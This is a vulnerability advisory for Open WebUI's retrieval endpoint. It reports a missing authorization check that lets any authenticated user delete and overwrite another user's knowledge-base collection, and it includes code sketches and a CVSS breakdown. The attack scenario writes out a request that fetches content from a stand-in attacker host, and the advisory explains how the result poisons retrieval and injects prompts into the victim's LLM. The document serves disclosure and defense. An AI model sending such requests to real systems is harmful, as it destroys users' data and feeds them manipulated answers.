Improper authorization control for web services in open-webui
Description
Open WebUI has Knowledge Base Destruction and RAG Poisoning via Unauthorized Collection Overwrite
Affected Component
Retrieval web/YouTube processing endpoints:
backend/open_webui/routers/retrieval.py (lines 1810-1837, process_web)
backend/open_webui/routers/retrieval.py (the parallel process_youtube endpoint)
backend/open_webui/routers/retrieval.py (line 1445, save_docs_to_vector_db call chain)
Affected Versions
Current main branch (commit 6fdd19bf1) and likely all versions with RAG/knowledge base functionality.
Description
The POST /api/v1/retrieval/process/web endpoint accepts a user-supplied collection_name and an overwrite query parameter (default: True). It performs no authorization check on whether the calling user owns or has write access to the target collection. When overwrite=True, save_docs_to_vector_db calls VECTOR_DB_CLIENT.delete_collection() on the target collection before writing new content.
Combined with the knowledge base enumeration vulnerability (separate report), an attacker can trivially discover any user's knowledge base UUID and then destroy or poison it.
    # retrieval.py:1810-1837: no collection authorization check
    @router.post('/process/web')
    async def process_web(
        request: Request,
        form_data: ProcessUrlForm,
        user=Depends(get_verified_user),
        ...
    ):
        ...
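To make the missing control concrete, here is a minimal sketch of an ownership check that could run before any write to a caller-supplied collection. It is not Open WebUI's actual code or fix: `User`, `KnowledgeBase`, `PermissionDenied`, and `authorize_collection_write` are hypothetical names, and the rule that collections not backed by a knowledge base pass through is an assumption made only to keep the example short.

```python
from dataclasses import dataclass, field


class PermissionDenied(Exception):
    """Raised when the caller may not write to the target collection."""


@dataclass
class User:
    id: str
    role: str = "user"


@dataclass
class KnowledgeBase:
    id: str  # assumed to double as the vector collection name
    owner_id: str
    writers: set = field(default_factory=set)  # user ids granted write access


def authorize_collection_write(user, collection_name, knowledge_bases):
    """Hypothetical guard: reject writes to a collection backed by another user's KB."""
    kb = knowledge_bases.get(collection_name)
    if kb is None:
        # Assumption: names that do not map to a knowledge base are not
        # covered by this rule and would need their own policy.
        return
    if user.role == "admin" or user.id == kb.owner_id or user.id in kb.writers:
        return
    raise PermissionDenied(f"user {user.id} may not write to {collection_name}")
```

In a handler like `process_web`, a check of this kind would have to run before the call chain reaches `save_docs_to_vector_db`, so that a rejected request never triggers the delete.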
CVSS 3.1 Breakdown
| Metric | Value | Rationale |
|---|---|---|
| Attack Vector | Network (N) | Exploited remotely via API call |
| Attack Complexity | Low (L) | Single API call with a known KB UUID |
| Privileges Required | Low (L) | Requires any authenticated user account |
| User Interaction | None (N) | No victim interaction required |
| Scope | Unchanged (U) | Impact within the knowledge base authorization boundary |
| Confidentiality | None (N) | No data disclosure from this vulnerability directly |
| Integrity | High (H) | Complete replacement of victim's KB content with attacker-controlled data |
| Availability | High (H) | Victim's original KB embeddings are deleted; KB effectively destroyed |
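The report lists metric values but no numeric score. As a worked check, the sketch below applies the CVSS v3.1 base score equations for the Scope: Unchanged case to the values in the table. The weights and the rounding routine follow the published v3.1 specification; the function and variable names are illustrative only.

```python
import math

# Metric weights from the CVSS v3.1 specification (Scope: Unchanged).
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value):
    """Round up to one decimal place using the integer method from the v3.1 spec."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score_scope_unchanged(av, ac, pr, ui, c, i, a):
    """Base score for a vector whose Scope metric is Unchanged."""
    iss = 1 - (1 - CIA[c]) * (1 - CIA[i]) * (1 - CIA[a])
    impact = 6.42 * iss
    exploitability = 8.22 * AV[av] * AC[ac] * PR_UNCHANGED[pr] * UI[ui]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


# AV:N / AC:L / PR:L / UI:N / S:U / C:N / I:H / A:H, as in the table above.
score = base_score_scope_unchanged("N", "L", "L", "N", "N", "H", "H")
print(score)  # 8.1
```

With these inputs the impact sub-score is about 5.18 and the exploitability sub-score about 2.84, which rounds up to 8.1, in the High severity band.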
Attack Scenario
1. Attacker discovers victim's KB UUID via the knowledge-bases meta-collection (separate finding) or other enumeration.
2. Attacker sends:

       POST /api/v1/retrieval/process/web?overwrite=true
       { "url": "https://attacker.com/poison", "collection_name": "<victim_kb_uuid>" }

3. The endpoint fetches content from the attacker's URL.
4. save_docs_to_vector_db deletes the entire vector collection belonging to the victim's knowledge base.
5. The attacker's fetched content is embedded and written as the new collection content.
6. Victim's RAG queries against their KB now return attacker-controlled content instead of their original documents.
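The delete-then-write sequence in the scenario above can be modelled with a toy in-memory store. This is a simplified illustration, not Open WebUI's vector client or its `save_docs_to_vector_db` implementation: `InMemoryVectorStore` and `save_docs` are hypothetical stand-ins, documents are plain strings rather than embeddings, and the collection name is a placeholder.

```python
class InMemoryVectorStore:
    """Toy stand-in for a vector DB client (hypothetical, for illustration)."""

    def __init__(self):
        self.collections = {}

    def delete_collection(self, name):
        # Dropping the collection discards everything stored under that name.
        self.collections.pop(name, None)

    def insert(self, name, docs):
        self.collections.setdefault(name, []).extend(docs)


def save_docs(store, collection_name, docs, overwrite=True):
    """Simplified model of the overwrite path: delete first, then write.

    Note that nothing here looks at who the caller is.
    """
    if overwrite:
        store.delete_collection(collection_name)
    store.insert(collection_name, docs)


store = InMemoryVectorStore()
victim_kb = "victim-kb-uuid"  # placeholder for the victim's collection name

# The victim's knowledge base is populated with legitimate documents.
save_docs(store, victim_kb, ["quarterly report", "internal runbook"])

# A different caller supplies the same collection name with overwrite=True.
save_docs(store, victim_kb, ["attacker-controlled text"], overwrite=True)

print(store.collections[victim_kb])  # ['attacker-controlled text']
```

Because the collection name is the only key, any caller who knows it reaches the same delete, which is why the authorization check has to happen before this function is invoked.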
Impact
Data destruction: Victim's original KB embeddings are permanently deleted from the vector store
RAG poisoning: Attacker-controlled content replaces legitimate knowledge, causing the LLM to return misleading or malicious answers to the victim
Indirect prompt injection: Poisoned content can contain crafted prompts that manipulate the victim's LLM behavior when queried
Persistence: The poisoned content persists until the KB is rebuilt from source files
Preconditions
Attacker must have a valid user account
Attacker must know the target collection name (KB UUID) — easily obtained via the knowledge-bases enumeration finding
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
| Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
| pypi | open-webui | 0.9.0 | |